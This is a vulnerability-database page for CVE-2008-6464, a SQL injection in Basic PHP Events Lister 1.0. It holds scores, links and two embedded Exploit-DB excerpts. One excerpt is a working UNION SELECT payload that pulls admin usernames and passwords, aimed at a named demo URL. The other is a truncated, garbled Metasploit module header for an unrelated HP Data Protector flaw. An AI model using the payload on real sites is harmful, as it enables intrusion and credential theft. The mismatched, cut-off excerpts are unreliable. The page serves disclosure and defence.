CVE-2008-6464
published 2009-03-13CVE-2008-6464: SQL injection vulnerability in event.php in Mevin Productions Basic PHP Events Lister 1.0 allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
60.1th percentile
SQL injection vulnerability in event.php in Mevin Productions Basic PHP Events Lister 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mevin | basic-php-events-lister | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
exploitdb·2014-03-10
CVE-2013-2347 HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway ', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '6464
Exploit-DB
Basic PHP Events Lister 1.0 - SQL Injection
exploitdb·2008-09-21
CVE-2008-6464 Basic PHP Events Lister 1.0 - SQL Injection
Basic PHP Events Lister 1.0 - SQL Injection
---
_____ ____ _____
/ _ \ /\ /\ / _ \ / _ \
| | | | \ \/ / ||_| | | | | |
| | | | \ / \_ | | | | |
| |_| | / \ __\ | | |_| |
\_____/ / /\ \ |____/ \_____/
\/ \/
[~] Basic PHP Events Lister Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: Basic PHP Events Lister
[~] site: http://www.mevin.com
[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip
[~] Vulnerability Class: SQL Injection
[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
[~] Exploit:
http://host/event.php?id=-0x90+union+select+0x
No writeups or analysis indexed.
http://osvdb.org/48499http://secunia.com/advisories/31779http://www.securityfocus.com/bid/31278http://www.vupen.com/english/advisories/2008/2648https://www.exploit-db.com/exploits/6508http://osvdb.org/48499http://secunia.com/advisories/31779http://www.securityfocus.com/bid/31278http://www.vupen.com/english/advisories/2008/2648https://www.exploit-db.com/exploits/6508
2009-03-13
Published